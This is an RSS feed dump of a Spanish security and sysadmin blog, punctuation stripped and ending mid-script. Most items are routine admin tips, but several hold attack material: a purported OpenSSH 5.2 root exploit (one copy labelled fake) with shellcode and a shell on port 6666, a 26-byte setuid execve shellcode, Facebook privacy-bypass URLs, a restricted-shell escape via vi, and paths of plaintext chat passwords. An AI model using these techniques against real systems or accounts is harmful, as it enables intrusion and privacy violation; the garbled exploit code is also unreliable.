<item><title>FAKE 0day OpenSSH   52 Remote root exploit</title><description>Secuobs.com : 2010-01-22 02:04:21 -  Unix   Cisco   Hacks  - En una entrada, admin me preguntaba si conocia un supuesto 0-day de ssh Se ha quitado algo para que no compile  Te refieres a este   Ver los comentarios antes de ejecutar el exploit    ---------------------------   OpenSSH h_addr    sock   socket PF_INET, SOCK_STREAM, 0  addrsin_port   htons port  addrsin_family   AF_INET  if  connect sock,  struct sockaddr addr, sizeof addr    -1  printf   -  Connecting failed n  return 1    payload   malloc limit   10000  ptr   payload 8  memcpy ptr,jmpcode,strlen jmpcode  jmpinst fopen shellcode 793, w  if jmpinst  fseek jmpinst,0,SEEK_SET  fprintf jmpinst, pourcentss ,shellcode  fclose jmpinst    ptr   strlen jmpcode  if target   5   target   6  memcpy ptr,shellcode,strlen shellcode  ptr   strlen shellcode  memset ptr,'B',limit   10000 - 8 - strlen shellcode    else  memcpy ptr,fbsd_shellcode,strlen fbsd_shellcode  ptr   strlen fbsd_shellcode  memset ptr,'B',limit   10000 - 8 - strlen fbsd_shellcode    send sock,buffer,strlen buffer ,0  send sock,ptr,3750,0  close sock  if connect sock,  struct sockaddr addr, sizeof addr    -1    printf   -  connecting failed n     payload sizeof payload -1    ' 0'  payload sizeof payload -2    ' 0'  send sock,buffer,strlen buffer ,0  send sock,payload,strlen payload ,0  close sock  free payload  addrsin_port   htons 6666  if connect sock,  struct sockaddr addr, sizeof addr    0      v--- our cool bar that says   r0000000t    printf n  n n  fremote PS1 'sh-32 '  bin sh    else printf   -  failed to exploit target  - n  close sock  return 0     IMAGE  </description><link>http://www.secuobs.com/revue/news/184268.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/184268.shtml</guid></item>
<item><title>sɐɹqo ǝp soɯɐʇsǝ</title><description>Secuobs.com : 2010-01-22 02:04:21 -  Unix   Cisco   Hacks  - Buenas, Estoy cambiando el aspecto del blog para que sea algo mas atractivo si cabe De paso estoy aprovechando para revisar las entradas, formatear codigo, añadir etiquetas, etc Todo ello en ratos muertos Y para que esta no sea la primera y unica entrada sin nada mas o menos tecnico, decir que descubri SyntaxHighlighter, a fully functional self-contained code syntax highlighter developed in JavaScript Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/184267.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/184267.shtml</guid></item>
<item><title>Estamos de obras</title><description>Secuobs.com : 2010-01-21 22:00:29 -  Unix   Cisco   Hacks  - Buenas, Estoy cambiando el aspecto del blog para que sea algo mas atractivo si cabe De paso estoy aprovechando para revisar las entradas, formatear codigo, añadir etiquetas, etc Todo ello en ratos muertos Y para que esta no sea la primera y unica entrada sin nada mas o menos tecnico, decir que descubri SyntaxHighlighter, a fully functional self-contained code syntax highlighter developed in JavaScript Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/184181.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/184181.shtml</guid></item>
<item><title>Bajar albumes de Picassa</title><description>Secuobs.com : 2010-01-20 16:19:13 -  Unix   Cisco   Hacks  - Hay muchas alternativas, algunas realmente ingeniosas, per una de las que me parece mas interesante es este script en Python  http codegooglecom p pycasa-download  Dispone tanto de GUI  con PyGtk  como de version texto, esta ultima sin mas requisito que Python Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/183660.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/183660.shtml</guid></item>
<item><title>Ver cosas que no debes en Facebook</title><description>Secuobs.com : 2010-01-19 11:55:27 -  Unix   Cisco   Hacks  - Bueno, visto que los de Facebook pasan de mi ante cualquier hack que les reporto, los publico aqui  El mitico fallo ese de ver fotos ajenas aqui esta arreglado Pero hagamos un poco de memoria Solo servia para los perfiles con pesimas configuraciones de privacidad Si tu en tu perfil especificabas que un album solo podian verlo tus amigos, entonces no habia tal bug Bien, he encontrado otra manera de acceder a los albumes de cualquiera que los tenga configurados con una privacidad pesima Recordemos que todo lo que hayas publicado en el pasado _mantiene_ la configuracion de privacidad establecida en su momento Es por esto que los usuarios que publicaron albumes con las pesimas opciones por defecto de la vieja politica de privacidad, siguen teniendo sus fotos accesibles Bien, el vector de ataque  http wwwfacebookcom ajax profile tabphp id AQUI_EL_uid v photos a 1 Y ahi, buscad en ese tocho la URL de cada album Debemos estar logueados en facebook Podeis probar por ejemplo con el uid numero 4, que es el del creador del Facebook   Aun hay mas señores Private IP disclosure  Sin necesidad de iniciar sesion  El vector de ataque  http wwwfacebookcom ajax presence reconnectphp reason 7 iframe_loaded false a 1 Y ahi buscad los js, abridlos en el navegador y vereis unas bonitas IPs privadas   Mas Conocer la lista de todos los amigos de CUALQUIERA Sin necesidad de estar logueado Aunque desmarques la casilla de que todos puedan ver tu lista de amigos Esto no descubierto por mi http wwwfacebookcom ajax typeahead_friendsphp u AQUI_EL_uid a 1 Mas Burlando al parser de Facebook Esta direccion esta prohibida en Facebook  http wwwfacebookcom lphp u https wwwfacebookcom lphp u wwwgooglees Asi no  http wwwfacebookcom lphp fb_noscript 1 u https wwwfacebookcom lphp fb_noscript 1 u wwwgooglees Mas burlas al parser de Facebook Como publicar cualquier URL baneada por Facebook en nuestro muro Basta convertir  ofuscar  la URL convirtiendola a un entero de 32 bits Para los que no se os den bien las matematicas  http funkyfilterscom url obfuscation Por ejemplo, asi salta un pop-up diciendo que el contenido es ofensivo y no podemos publicarlo  http wwwfacebookcom lphp u http wwwfacebookcom lphp u http wwwfacebookcom lphp u wwwgooglees Y asi lo burlamos y conseguimos publicar lo que nos de la gana  http 1161803024 lphp u http 1161803024 lphp u http 1161803024 lphp u wwwgooglees La seguridad por oscuridad no es seguridad  Paros es bello  Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/183059.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/183059.shtml</guid></item>
<item><title>Track down your stolen laptop   Prey</title><description>Secuobs.com : 2010-01-07 09:16:21 -  Unix   Cisco   Hacks  - Prey is a lightweight application that will help you track and find your laptop if it ever gets stolen It works in all operating systems and not only is it Open Source but also completely free http preyprojectcom  Ahi queda eso Gracias Roge por el aviso   Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/179111.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/179111.shtml</guid></item>
<item><title>Descargar videos de RTVE</title><description>Secuobs.com : 2009-12-25 20:48:02 -  Unix   Cisco   Hacks  - Hoy me hizo una visita de Navidad mi tio, y me comento que no le funcionaban muy bien los programas que el usaba para bajar videos, concretamente de RTVE Me comento que el pedia bajar un video, y que el programa le bajaba otro Le dije que me lo miraria, y ahora despues de la despedida y de la siesta, este es el procedimiento que he encontrado Es un poco manual, pero no necesitamos instalar ningun programa 1- Entrar en RTVE Alacarta 2- Boton derecho sobre el titulo del video deseado   Abrir en nueva pestaña Yo he escogido como ejemplo el mensaje navideño del Rey para hacer la prueba Vemos en la direccion del navegador  http wwwrtvees alacarta player 656335html 3- Sustituir el html subrayado por xml La direccion resultante quedaria asi  http wwwrtvees alacarta player 656335xml 4- Nos aparecen un monton de lineas No te preocupes tio, fijate en la encerrada entre  y  En nuestro ejemplo del mensaje navideño del Rey  rtmp streamrtvees stream resources alacarta flv 3 6 1261688753463flv 5- Vamos a tachar lo que no nos interesa de esa linea tio rtmp streamrtvees stream resources alacarta flv 3 6 1261688753463flv 6- Nos queda entonces la siguiente direccion  rtvees resources alacarta flv 3 6 1261688753463flv 7- Intro y a guardar al disco duro Como reproductor de videos, te recomiendo el Videolan, pues aparte de ser 100pourcents libre y gratuito para descargar desde su pagina web http wwwvideolanorg vlc , incorpora practicamente todos los codecs necesarios para poder reproducir todo tipo de formatos de video, ya esten comprimidos con DiVX, XviD, etc, o simplemente archivos FLV como es nuestro caso Bajate los binarios para Windows, e instalalo segun el procedimiento habitual, siguiente-siguiente-siguiente--finalizar Para otro tipo de paginas de videos puedes usar http wwwatrapavideocom Hablan bastante bien de ella Y si tienes algun problema, comentario al canto o telefonazo Suerte, y felices fiestas a todos  IMAGE  </description><link>http://www.secuobs.com/revue/news/175815.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/175815.shtml</guid></item>
<item><title>Conversores de varios formatos online</title><description>Secuobs.com : 2009-12-24 13:52:39 -  Unix   Cisco   Hacks  - Suelen funcionar especificando un archivo URL y un mail, a donde nos llega un enlace para descargar el archivo convertido A mi me resultan muy utiles, ya que prefiero siempre instalar el menor numero de programas posibles http wwwzamzarcom  http wwwyouconvertitcom  http wwwconvertfilescom  Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/175576.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/175576.shtml</guid></item>
<item><title>Sobre certificados, CAs, SSL y demas</title><description>Secuobs.com : 2009-12-19 19:01:50 -  Unix   Cisco   Hacks  - En Wadalbertia estamos discutiendo, en el sentido correcto de la palabra claro, sobre todos estos temas en este hilo Lo enlazo porque me parece bastante interesante Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/174295.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/174295.shtml</guid></item>
<item><title> Hackeando  aplicaciones de Facebook</title><description>Secuobs.com : 2009-12-10 04:44:18 -  Unix   Cisco   Hacks  - Como consegui ser el mas inteligente en Brain Buddies de Facebook sin jugar ni una partida Jugar de forma normal y aburrida claro    IMAGE  Bueno, decir que no es ninguna proeza Basicamente lo que hice fue poner un proxy local en mi maquina, en mi caso Paros, que se que hace años que no se actualiza, pero es con el que me siento mas comodo Luego apuntar el navegador a 127001 hacia el puerto en que paros estaba escuchando en mi maquina, y poner a Paros en modo  trap request response , que por defecto no lo hace Entonces con un poco de paciencia di con el paquete que contenia el mensaje, y lo modifique a mi antojo, eso si, respetando la codificacion  espacio pourcents20 , etc  Y mas tarde di con el paquete que contenia el servidor  externo en el caso de este juego  con la imagen con un nombre tal que porcentaje00jpg Intuitivamente trate de buscar la imagen porcentaje100jpg pero no existia en ese directorio, probe con porcentaje99jpg y bingo  Lo que pasa es que ciertas aplicaciones, en un campo de las cabeceras http incluyen un  flag  que les permite averiguar si el contenido ha sido modificado Anulando ese  flag  y un par de variables mas, logre ese pequeño  hack  Ah, ni idea del codigo de la aplicacion, solo estudie como se comportaba el juego a nivel de paquetes enviados y recibidos Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/170423.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/170423.shtml</guid></item>
<item><title>Wireless Distribution System  WDS </title><description>Secuobs.com : 2009-12-03 06:48:14 -  Unix   Cisco   Hacks  - Se que esto es algo basico, pero me lo apunto para tenerlo en cuenta en el futuro Para distribuir la señal entre varios APs a lo largo de un edificio, quizas lo ideal seria usar WDS, que lo que permite basicamente es la interconexion de varios APs que actuarian en  modo repetidor  de la señal entre ellos Basicamente se tienen que cumplir las siguientes condiciones  1 Todos los APs tienen que operar en el mismo canal 2 El ESSID de cada uno debe ser distinto, con el fin de que cada equipo sepa en cada momento a que AP esta asociado 3 En cuanto a la seguridad, puedes usar WEP WPA y filtrado por MAC sin problemas 4 Cada AP se comunica mediante los demas por los BSSIDs  direcciones MAC  de los demas APs, por lo que de alguna manera hay que especificarlo en cada uno Estos 4 puntos deben cumplirse siempre para un correcto funcionamiento de WDS Una vez implementado WDS, el proceso de asociacion de una maquina a un determinado AP es totalmente transparente para el usuario, solo hay que realizar cambios en los APs  IMAGE  </description><link>http://www.secuobs.com/revue/news/168096.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/168096.shtml</guid></item>
<item><title>En IRC se envian las credenciales en texto plano</title><description>Secuobs.com : 2009-11-29 17:46:19 -  Unix   Cisco   Hacks  - Por eso muchos clientes de IRC que ofrecen la posibilidad de recordar contraseñas cifran o codifican la contraseña recordada en algun fichero Aqui una captura, editada, pues la tengo de hace tiempo en unas pruebas que estuve haciendo, y la verdad es que no me apetece mucho volver a poner el sniffer a correr con otras credenciales sorry Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/166105.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166105.shtml</guid></item>
<item><title>Nueva  version  de Google</title><description>Secuobs.com : 2009-11-28 01:03:33 -  Unix   Cisco   Hacks  - Via NewLog de Wadalbertia, me entero de que los de Google estan que no paran, ademas del interesante nuevo protocolo SPDY  sobre el que hablamos aqui , estan preparando una nueva  version  de su buscador Aun no es oficial, sin embargo, con algun que otro hack podemos acceder e ir probando como sera proximamente el buscador Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/165889.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/165889.shtml</guid></item>
<item><title>Recogiendo datos para Analisis Forense de sistemas Windows</title><description>Secuobs.com : 2009-11-22 21:03:14 -  Unix   Cisco   Hacks  - Estoy escribiendo en este hilo de Wadalbertia un  paper  por llamarlo de alguna forma sobre la obtencion de datos para Analisis Forense en sistemas Windows Estoy procurando ser lo mas metodico posible, y aun no lo he terminado, de todas formas se acepta cualquier tipo de critica, comentario o sugerencia Suerte,  IMAGE  </description><link>http://www.secuobs.com/revue/news/163954.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/163954.shtml</guid></item>
<item><title>Husmeando en archivos  II  Kmess guarda user pass en texto plano</title><description>Secuobs.com : 2009-09-22 06:19:49 -  Unix   Cisco   Hacks  - Este cliente de messenger para Linux, guarda user pass en un archivo en el que tiene acceso de lectura todo el mundo   home user kde share config kmessrc amsn, mas conocido, guarda esta informacion cifrada IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/143038.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/143038.shtml</guid></item>
<item><title>Husmeando en archivos  III  cypher will not save you</title><description>Secuobs.com : 2009-09-22 06:19:49 -  Unix   Cisco   Hacks  - amsn cifra la contraseña El archivo donde la guarda cifrada es   home user amsn configxml La variable es remotepassword Aunque este cifrada, que me consta que es en DES, bastaria que un atacante copiara ese configxml en su maquina IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/143037.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/143037.shtml</guid></item>
<item><title>Husmeando en archivos  IV </title><description>Secuobs.com : 2009-09-22 06:19:49 -  Unix   Cisco   Hacks  - pidgin, conocido cliente de messenger para Linux, guarda las contraseñas en texto plano tambien Dentro de nuestro home, hacemos una busqueda por el archivo accountsxml Lamentable IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/143036.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/143036.shtml</guid></item>
<item><title>0day OpenSSH   52 Remote root exploit</title><description>Secuobs.com : 2009-09-22 06:19:49 -  Unix   Cisco   Hacks  - En una entrada, admin me preguntaba si conocia un supuesto 0-day de ssh Se ha quitado algo para que no compile, pero es obvio  Te refieres a este    ---------------------------   OpenSSH h_addr    sock   socket PF_INET, SOCK_STREAM, 0  addrsin_port   htons port  addrsin_family   AF_INET  if  connect sock,  struct sockaddr addr, sizeof addr    -1  printf   -  Connecting failed n  return 1    payload   malloc limit   10000  ptr   payload 8  memcpy ptr,jmpcode,strlen jmpcode  jmpinst fopen shellcode 793, w  if jmpinst  fseek jmpinst,0,SEEK_SET  fprintf jmpinst, pourcentss ,shellcode  fclose jmpinst    ptr   strlen jmpcode  if target   5   target   6  memcpy ptr,shellcode,strlen shellcode  ptr   strlen shellcode  memset ptr,'B',limit   10000 - 8 - strlen shellcode    else  memcpy ptr,fbsd_shellcode,strlen fbsd_shellcode  ptr   strlen fbsd_shellcode  memset ptr,'B',limit   10000 - 8 - strlen fbsd_shellcode    send sock,buffer,strlen buffer ,0  send sock,ptr,3750,0  close sock  if connect sock,  struct sockaddr addr, sizeof addr    -1    printf   -  connecting failed n    payload sizeof payload -1    ' 0'  payload sizeof payload -2    ' 0'  send sock,buffer,strlen buffer ,0  send sock,payload,strlen payload ,0  close sock  free payload  addrsin_port   htons 6666  if connect sock,  struct sockaddr addr, sizeof addr    0      v--- our cool bar that says   r0000000t    printf n  n n  fremote PS1 'sh-32 '  bin sh    else printf   -  failed to exploit target  - n  close sock  return 0   IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/143035.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/143035.shtml</guid></item>
<item><title>mmm  creo que esta es tu IP publica no </title><description>Secuobs.com : 2009-08-24 00:08:42 -  Unix   Cisco   Hacks  - http wwworkspacenet owned    Gracias a sparc  IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/133592.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/133592.shtml</guid></item>
<item><title>Smallest GNU Linux x86 setuid execve shellcode without NULLs</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Bueno, consegui mejorar un poco la genial shellcode de Chema Garcia de opensec Ahora soy yo el que tiene la shellcode mas pequeña del mundo haha  aun basandome -muchisimo, solo cambie un par de lineas- en la suya  Yo consegui reducirla 1 byte 26 bytes Ahora  quien es el siguiente    Ahi va    Smallest GNU Linux x86 setuid execve shellcode without NULLs  based on Chema Garcia, aka sch3m4's code from opensec   shrinked down only for the fun of gettin' the most minimalistic shellcode possible  vlan7 - 19 11 2008 http vlan7blogspotcom Shellcode size  26 bytes    include  char sc     x31 xc9   xor ecx,ecx  x8d x41 x17   lea eax, ecx 17h   x60   pusha  xcd x80   int 80h  x61   popa  x51   push ecx  x68 x6e x2f x73 x68   push 0x68732f6e  x68 x2f x2f x62 x69   push 0x69622f2f  x89 xe3   mov ebx,esp  xb0 x0b   mov al,0bh  xcd x80   int 80h void main    printf Smallest GNU Linux x86 setuid execve shellcode without NULLs   n based on Chema Garcia, aka sch3m4's code from opensec   only for the fun of gettin' the most minimalistic shellcode possible   n nvlan7 - 19 11 2008   nhttp vlan7blogspotcom   n nShellcode size  pourcentsd bytes n , sizeof sc -1   void   sc    -Mi shellcode en Packetstorm  http packetstormsecurityorg filedesc smallest_setuid_execve_scchtml -Mi shellcode en Wadalbertia  con comentarios nuestros  http wwwwadalbertiaorg phpBB2 viewtopicphp t 5139 -La shellcode de Chema Garcia  gracias Chema  http openseces 2008 11 14 gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122370.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122370.shtml</guid></item>
<item><title>Bit Twiddling Hacks</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Bit Twiddling Hacks By Sean Eron Anderson seander csstanfordedu Individually, the code snippets here are in the public domain  unless otherwise noted    feel free to use them however you please The aggregate collection and descriptions are   1997-2005 Sean Eron Anderson The code and descriptions are distributed in the hope that they will be useful, but WITHOUT ANY WARRANTY and without even the implied warranty of merchantability or fitness for a particular purpose As of May 5, 2005, all the code has been tested thoroughly Thousands of people have read it Moreover, Professor Randal Bryant, the Dean of Computer Science at Carnegie Mellon University, has personally tested almost everything with his Uclid code verification system What he hasn't tested, I have checked against all possible  32-bit  inputs To the first person to inform me of a legitimate bug in the code, I'll pay a bounty of US 10  by check or Paypal  If directed to a charity, I'll pay US 20 Bit Twiddling Hacks IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122369.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122369.shtml</guid></item>
<item><title>PostIt  Smallest GNU Linux x86 setuid execve shellcode without NULLs</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Aqui esta todo lo que tengo que decir, en una de mis casas  http wwwwadalbertiaorg phpBB2 viewtopicphp t 5139 Gracias NeTTinG por hacerlo post-it, da gusto Wadalbertia, da gusto, de verdad   Y a sch3ma de Opensec, he has initiated the funny game   Si me lo permitis or recomiendo un buen libro del que me he podido empapar de bastante informacion  Writing Security Tools and Exploits, de Syngress Ah, por esta vez paso de mandarlo a ningun lado, yo ya estoy contento desprendiendo conocimiento a mi alrededor, mucho o poco, pero conocimiento Total que Suerte y Exitos IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122368.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122368.shtml</guid></item>
<item><title>pourcents CPU limiters</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - CPU Usage Limiter for Linux BES   Battle Encoder Shirase 138 for Windows XP 2000 IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122367.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122367.shtml</guid></item>
<item><title>Migracion Exchange 55 - 2003</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Esto es lo que he recuperado de un doc que tenia sobre migraciones de Exchange 55 a versiones superiores No es necesario pasar por 2000 A destacar que 55 usaba su propio Directorio, por lo que es necesario integrarlo en AD MIGRACIÓN EXCHANGE 55-2003 Requisitos DC  -W2k3 Server  Todas las funcionalidades de Exchange 2k3  Recomendado o -W2k Server SP3 Requisitos Exchange 2k3  2GB RAM HD mínimo   Tamaño medio buzón   Num users NTFS IIS Servicio SMTP Servicio NNTP  aunque no se use  Otros  ASPNET, Net Framework  Migración 55 - 2k3   0- Migración a AD  - Sólo si el DC es NT Backup previo 1- Instalación   Config Conector de AD 2- Instalación Exchange 2k3 en organización actual 3- Migración datos 4- Eliminación Desconexión cable red Exchange 55 Aquí ya estamos operativos Default mode  Mixto 5- Comprobación   Paso del tiempo  6- Paso a Modo Nativo -Opcional Más óptimo que Mixto Irreversible Seguridad, Administración     IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122366.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122366.shtml</guid></item>
<item><title>Sobre espacio ocupado por la bd de Active Directory</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Algunos administradores lo que hacen para conocer el espacio ocupado por la bd de AD es usar el comando  ntdsutil files info El problema es que este comando da error si no es ejecutado en modo Restauracion de AD Realmente la solucion es mucho mas sencilla _Toda_ la bd de AD se encuentra en el archivo ntdsdit Lo que pese el archivo es el tamaño de la bd de AD Es desfragmentable y es posible ver cuanto espacio en HD podemos ganar  tras eliminar objetos de AD  mediante una desfragmentacion que tanto puede ser online como offline Google IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122365.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122365.shtml</guid></item>
<item><title> nix Saltando restriccion noexec   evadiendo una shell restrictiva</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Si un buen administrador ha incluido en el fstab  vfstab en solaris  la opcion noexec para montaje de la particion digamos  home del usuario, su idea seria que el usuario no pudiera ejecutar programas bajados por el, es decir, que residan en la particion montada como noexec Al intentar ejecutar un script con  scriptsh No nos lo permite el sistema Podemos saltarnos esta restriccion anteponiendo el script en el que esta programado Por ejemplo   bin bash scriptsh Para archivos binarios ejecutables, y esto es en Linux   lib ld-linuxso2 binario Como administradores se nos podria ocurrir quitar el permiso de ejecucion a ld-linuxso2 , pero  que sistema no tiene alguna libreria dinamicamente enlazada  Asi que esa no es una solucion viable Lo que podemos hacer es dar al usuario una shell restrictiva tipo bash-r como shell por defecto en el  etc passwd Con esto lo que hacemos es una jaula en la que el usuario no puede ejecutar programas que no esten en el PATH, y por supuesto, no puede modificar la variable PATH Bien, como todo lo que una mente humana puede asegurar, otra mente humana puede violar, como atacantes procederiamos asi El viejo editor vi tiene una opcion para ejecutar comandos de shell probador  cd  rbash  cd  restricted probador  vi pruebash Y en vi   set shell bin bash  shell probador  cd  probador home  Suerte, IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122364.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122364.shtml</guid></item>
<item><title>html mailto tag encoder antispam</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - http rumkincom tools mailto_encoder customphp IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122363.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122363.shtml</guid></item>
<item><title>0-day in ZipArchive's PHP</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Hoy me puse en contacto con el  security response team  de PHP sobre un bug que descubri en ZipArchive de PHP que, que yo sepa, no habia sido hecho publico Pues bien, hoy mismo me han respondido, y como ya esta solucionado, aqui pongo el mail que les mande  On Wed, Jan 28, 2009 at 4 32 PM, vlan7 wrote   Hi    Recently I've found a vulnerability in ZipArchive's PHP   An atacker would overwrite any file doing a directory transversal simply  naming zipped archives somethin' like     var www hackphp   Are you aware of this  Yes, it is fixed in 530 and partially fixed in 52x  a bug in a zend function did not fix it nicely  Everything should be fien in 529  RC1 to be released soon  Thanks for your report  Cheers, IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122362.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122362.shtml</guid></item>
<item><title>Win Ofrecer asistencia remota en la LAN</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - hcp CN Microsoftpourcents20Corporation,L Redmond,S Washington,C US Remotepourcents20Assistance Escalation Unsolicited unsolicitedrcuihtm Esto es con permiso del usuario IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122361.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122361.shtml</guid></item>
<item><title>VMWare tools Ubuntu</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Click en Instalar VMWare tools sudo su Montar cdrom tar xzvf VMWare targz  a  tmp  apt-get install gcc make apt-get install linux-headers uname -r  ln -s  usr src linux-headers uname -r   usr src linux  vmware-installpl IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122360.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122360.shtml</guid></item>
<item><title>VMWare Ubuntu Debian eth0 desaparece</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Tras copiar una VM, eth0 desaparece Asi lo arregle yo  Editar  En Ubuntu   etc udev rulesd 70-persistent-netrules En Debian   etc udev rulesd z25-persistent-netrules Borrar la primera entrada y cambiar en la segunda eth1 por eth0 Reiniciar servicios asociados   etc initd udev restart  etc initd networking restart No es necesario reiniciar el host  Si seleccionamos mover nos olvidamos de este problema, ya que se mantiene todo el estado de la maquina, direccion MAC incluida Esto viene bien en un entorno donde se quiera una altadisponibilidad con una VM de backup que en caso de fallo de una podamos levantar la otra  IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122359.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122359.shtml</guid></item>
<item><title>User Profile Deletion Utility  Delprofexe </title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Delprofexe is a command-line utility that you can use to delete user profiles on a local or remote computers running Windows 2000, Windows XP, and Windows Server 2003 http wwwmicrosoftcom downloads detailsaspx familyid 901a9b95-6063-4462-8150-360394e98e1e displaylang en IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122358.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122358.shtml</guid></item>
<item><title>Equipos wireless iniciar sesion en dominio</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - Si un equipo nunca ha iniciado sesion en un dominio, no tendra guardadas las credenciales en cache Esto es un problema para equipos wifi que quieran iniciar sesion en el dominio de nuestra organizacion Y aunque tengan guardadas las credenciales en cache, no se ejecutara en su maquina ningun logonscript La solucion es cargar y activar la tarjeta wifi antes del inicio de sesion, antes de autenticarse Yo me quedo con esta manera de hacerlo  1 Usar el servicio Windows Zero Configuration  Inicio de sesion wifi facil o algo asi se llama en castellano  2 regedit HKLM   Software   Microsoft   WindowsNT   CurrentVersion   Winlogon Añadir valor DWORD GpNetworkStartTimeoutPolicyValue 3c  hexa  o 60  dec  3 regedit HKLM   Software   Policies   Microsoft   Windows   System Añadir valor DWORD GroupPolicyMinTransferRate a 0 Y los clientes ya podran iniciar sesion como si estuvieran conectados a la red cableada IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122357.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122357.shtml</guid></item>
<item><title>Asistente agregar impresoras linea de comandos</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - RUNDLL32 PRINTUIDLL,PrintUIEntry  il Mas ejemplos en http wwwrobvanderwoudecom 2kprintcontrolphp A mi me fue util en una ocasion IMAGE IMAGE  </description><link>http://www.secuobs.com/revue/news/122356.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122356.shtml</guid></item>
<item><title>VMWare disaster recovery</title><description>Secuobs.com : 2009-07-20 01:11:46 -  Unix   Cisco   Hacks  - La idea es tener una tarea cron que copie las maquinas virtuales de un host fisico a otro host fisico VMWare No se realiza escritura a disco, pues en VMWare es lo que mas penalizado se ve Se comprime todo en un lado del tunel ssh, y por el otro lado se va descomprimiendo Ahi va   bin bash    Copia VMs de FISICA1 a FISICA2 para Disaster Recovery    vlan7   13-5-09   ALERTA 80  20pourcents espacio libre ssh fisica2 df -HP grep mapper  awk '  print  5      1  ' awk '  print  1 '  cut -d'pourcents' -f1  tmp output uso cat  tmp output  if    uso -g  ALERTA   then echo  uso pourcents de espacio utilizado a fisica2, abortando copia   var log copiaVMsVMWarelog fi if    uso -le  ALERTA   then  host1 echo  Apagando la VM host1 -  date   var log copiaVMsVMWarelog vmrun -T server -h https fisica1 8333 sdk -u user -p passwd stop  standard  host1 host1vmx  soft echo  Apagada la VM host1 -  date   var log copiaVMsVMWarelog tar czvf -  var lib vmware Virtual  Machines host1  ssh fisica2  cd     